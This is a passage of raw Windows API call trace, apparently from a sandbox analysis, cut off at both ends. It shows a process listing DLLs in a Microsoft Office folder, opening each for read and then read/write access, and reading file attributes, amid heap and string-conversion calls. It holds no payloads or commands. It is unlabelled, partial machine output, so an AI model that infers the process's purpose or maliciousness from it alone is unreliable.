Context=0x0) returned 1 [0099.598] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0099.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.598] AreFileApisANSI () returned 1 [0099.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 78 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.598] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.598] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.599] AreFileApisANSI () returned 1 [0099.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c650 [0099.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 78 [0099.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0099.600] GetFileType (hFile=0x33c) returned 0x1 [0099.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.600] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.600] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.600] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.600] CloseHandle (hObject=0x33c) returned 1 [0099.600] AreFileApisANSI () returned 1 [0099.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d2c8 [0099.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8d2c8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 78 [0099.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0099.601] GetFileType (hFile=0x33c) returned 0x1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0099.601] CloseHandle (hObject=0x33c) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.602] AreFileApisANSI () returned 1 [0099.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c8f0 [0099.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8c8f0, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll") returned 78 [0099.602] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-file-l2-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0952017, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0952017, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0a832cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.602] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.602] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.602] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd089348e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd089348e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd09c4608, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0099.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x719c8 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0099.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0099.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.603] AreFileApisANSI () returned 1 [0099.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 86 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.604] AreFileApisANSI () returned 1 [0099.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0099.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81638 [0099.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81638, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 86 [0099.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0099.604] GetFileType (hFile=0x33c) returned 0x1 [0099.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0099.604] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.604] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.604] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.605] CloseHandle (hObject=0x33c) returned 1 [0099.605] AreFileApisANSI () returned 1 [0099.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81130 [0099.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81130, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 86 [0099.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0099.605] GetFileType (hFile=0x33c) returned 0x1 [0099.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0099.605] CloseHandle (hObject=0x33c) returned 1 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.606] AreFileApisANSI () returned 1 [0099.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0099.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x811e8 [0099.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x811e8, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 86 [0099.606] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd089348e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd089348e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd09c4608, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x52c0)) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.606] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.606] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.606] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd115de42, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd115de42, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd158a009, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="AP750A~1.DLL")) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: 